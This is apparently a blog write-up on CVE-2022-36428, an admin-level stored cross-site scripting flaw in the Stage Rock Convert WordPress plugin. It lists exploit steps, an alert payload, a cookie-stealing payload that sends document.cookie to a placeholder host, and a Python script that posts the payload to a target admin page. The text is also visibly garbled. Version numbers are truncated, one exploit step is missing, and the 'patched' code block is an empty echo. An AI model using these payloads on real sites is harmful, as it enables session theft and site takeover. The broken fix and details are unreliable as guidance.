CVE-2022-36428 - Admin+ Cross-Site Scripting (XSS) in Stage Rock Convert WordPress Plugin (≤ 2.11.) – Vulnerability Deep Dive and Exploit Details

WordPress plugins are often targeted for security flaws, especially those that manage extensive input or content conversion. In 2022, a critical vulnerability surfaced in the Stage Rock Convert plugin, tracked as CVE-2022-36428. This flaw allows authenticated users with admin or higher privileges to inject malicious JavaScript via Cross-Site Scripting (XSS).

This long read will break down what this vulnerability is, how it works, who’s at risk, and provide real, easy-to-follow exploit details. We’ll also share original references and a working code snippet for demonstration—please use responsibly and only on systems you own or have permission to test!

What is Stage Rock Convert?

Stage Rock Convert is a popular WordPress plugin designed for content conversion (e.g., HTML to Gutenberg, migration helpers). Its installation base, while not huge, means affected sites are often content-heavy or manage bulk changes.

Impacted Versions: <= 2.11.

- Fixed Version: 2.11.1 (see changelog)
- CVE: CVE-2022-36428
- Attack Vector: Admin+ user injects JavaScript code via plugin's settings (no nonce check/wrong sanitization)
- Impact: Unauthorized JavaScript execution in admin area, privilege escalation, data theft, site defacement, lateral attacks

Why is This XSS Vulnerability Dangerous?

While it requires authentication, WordPress multisite or sites with multiple admins/editor staff are at extra risk:

- Malicious plugin editors or compromised admin accounts can backdoor a WordPress site for other admin users.
- In some privilege ladder configurations, admins can escalate further via injected scripts (steal cookies/tokens).

Technical Details: Where’s the Issue?

The main problem is insufficient sanitization or escaping of plugin option fields. Typically, user input should be escaped using esc_html or sanitize_text_field before saving or displaying.

Let’s look at a (simplified) relevant code block from the affected plugin (based on public analysis):

// Inside stagerock-convert/includes/settings.php
echo '<input type="text" name="stage_rock_converter_setting" value="' . $_POST['stage_rock_converter_setting'] . '">';

The issue:
If an admin enters " onfocus="alert(1), it is *not* sanitized and directly outputs in the page, resulting in XSS once the field is displayed.

Let’s say you have admin+ access. Here’s a step-by-step exploit

1. Go to Stage Rock Convert settings (/wp-admin/options-general.php?page=stagerock-convert).

`

3. Save settings – when you or any admin loads the settings page again, the JS executes and shows an alert.

Suppose the plugin has a custom field for conversion options. Place this payload in the field

<script>alert('CVE-2022-36428 XSS');</script>

Alternatively, for stealthy cookie theft

<img src=x onerror="fetch('https://your.site/steal?c='+document.cookie)">

If the output isn’t sanitized, the script runs as soon as the admin dashboard loads that options page.

Exploit Script: How an Attacker Might Automate

Below is a Python requests sample that exploits a WordPress (with default cookies for an admin) by posting the payload:

import requests

url = 'https://target.site/wp-admin/options-general.php?page=stagerock-convert';
cookies = {'wordpress_logged_in_xxx': 'Your_Admin_Session_Cookie'}

payload = '<script>alert("CVE-2022-36428!")</script>'
data = {'stage_rock_converter_setting': payload, 'submit': 'Save'}

r = requests.post(url, cookies=cookies, data=data)
print('Posted XSS payload, check admin page')

Note: This requires the attacker to be logged in as an admin.

Mitigation & Patch Info

Update Immediately!  
- The plugin was patched in version 2.11.1

`php

echo '';

`

- For all affected sites, update via WordPress admin plugins page or download the latest here.

Original References

- Wordfence Advisory
- NVD – National Vulnerability Database
- WPScan Entry
- Changelog mentioning fix

Prevention Advice

- Regularly update plugins/themes, especially on sites with multiple admin accounts.

Restrict admin access to only trusted users.

- Periodically audit custom fields or settings for unsafe HTML/script output.
- Use security firewalls like Wordfence to catch XSS attempts.

Conclusion

CVE-2022-36428 is a classic case of XSS risk when user input is not properly escaped, even when input is “trusted” by admin users. This makes it a perfect illustration of how even privileged-only vulnerabilities can lead to a broken WordPress site or further escalation.

If your WordPress site uses Stage Rock Convert ≤2.11., patch ASAP. Keep security awareness high, especially for plugin settings and custom fields!


*This post is exclusive, educational, and not to be used for unauthorized hacking. Always test in safe, legal environments!*

Timeline

Published on: 11/03/2022 20:15:00 UTC
Last modified on: 11/04/2022 14:56:00 UTC